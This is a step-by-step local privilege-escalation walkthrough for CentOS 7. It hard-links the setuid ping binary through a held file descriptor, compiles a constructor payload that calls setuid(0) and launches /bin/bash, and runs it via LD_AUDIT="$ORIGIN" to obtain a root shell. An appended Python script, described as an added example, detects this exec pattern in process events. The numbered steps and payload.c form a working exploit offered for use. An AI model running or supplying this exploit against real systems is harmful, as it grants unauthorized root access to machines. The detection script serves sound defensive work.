Privilege escalation from a regular user on CentOS
Test system version: CentOS 7, Linux 3.10.0-1127.8.2.el7.x86_64 x86_64 GNU/Linux
gcc must be installed first:
yum -y install gcc automake autoconf libtool make
Begin the privilege escalation
1. adduser test
2. passwd test
3. mkdir /tmp/exploit
4. ln -s /usr/bin/ping /tmp/exploit/target
5. exec 3< /tmp/exploit/target
6. ls -l /proc/$$/fd/3
7. rm -rf /tmp/exploit
8. ls -l /proc/$$/fd/3
9. vim payload.c
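Copy the following content and paste it into the file:
#include <stdlib.h>   /* system() */
#include <unistd.h>   /* setuid() */
/* The constructor attribute runs init() as soon as the shared object is loaded. */
void __attribute__((constructor)) init()
{
    setuid(0);
    system("/bin/bash");
}
10. gcc -w -fPIC -shared -o /tmp/exploit payload.c
11. ls -l /tmp/exploit
12. LD_AUDIT="$ORIGIN" exec /proc/self/fd/3
13. whoami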
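A detection-side view of step 12, as an added example that is not part of the original page: it flags process-execution events in which a dynamic-loader variable contains $ORIGIN, the program is executed through a /proc file descriptor path, or both. The JSON event schema (pid, uid, path, env), the sample events and the function names are assumptions constructed for this illustration.

```python
import json
import re

# Dynamic-loader variables that make ld.so load extra code into a process.
LOADER_VARS = ("LD_AUDIT", "LD_PRELOAD", "LD_LIBRARY_PATH")
ORIGIN_RE = re.compile(r"\$(ORIGIN\b|\{ORIGIN\})")
PROC_FD_RE = re.compile(r"^/proc/(self|\d+)/fd/\d+$")

# Constructed sample events (hypothetical schema: one JSON object per exec).
SAMPLE_EVENTS = r'''
{"pid": 4101, "uid": 1001, "path": "/usr/bin/ls", "env": {"PATH": "/usr/bin"}}
{"pid": 4102, "uid": 1001, "path": "/proc/self/fd/3", "env": {"LD_AUDIT": "$ORIGIN"}}
{"pid": 4103, "uid": 0, "path": "/usr/bin/make", "env": {"LD_LIBRARY_PATH": "/opt/app/lib"}}
{"pid": 4104, "uid": 1002, "path": "/opt/app/bin/run", "env": {"LD_LIBRARY_PATH": "${ORIGIN}/../lib"}}
{"pid": 4105, "uid": 1002, "path": "/proc/4105/fd/7", "env": {}}
'''

def classify(event):
    """Return (severity, reasons) for one exec event."""
    env = event.get("env", {})
    hits = [v for v in LOADER_VARS if ORIGIN_RE.search(env.get(v, ""))]
    via_fd = bool(PROC_FD_RE.match(event.get("path", "")))
    reasons = [f"{v} contains $ORIGIN" for v in hits]
    if via_fd:
        reasons.append("executed through a /proc file descriptor path")
    if hits and via_fd:
        severity = "high"      # both halves of step 12 in a single exec
    elif reasons:
        severity = "review"    # one indicator alone also occurs in benign use
    else:
        severity = "none"
    return severity, reasons

def scan(lines):
    """Yield (pid, severity, reasons) for every event that is not clean."""
    for line in lines.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        severity, reasons = classify(event)
        if severity != "none":
            yield event["pid"], severity, reasons

if __name__ == "__main__":
    for pid, severity, reasons in scan(SAMPLE_EVENTS):
        print(pid, severity, "; ".join(reasons))
```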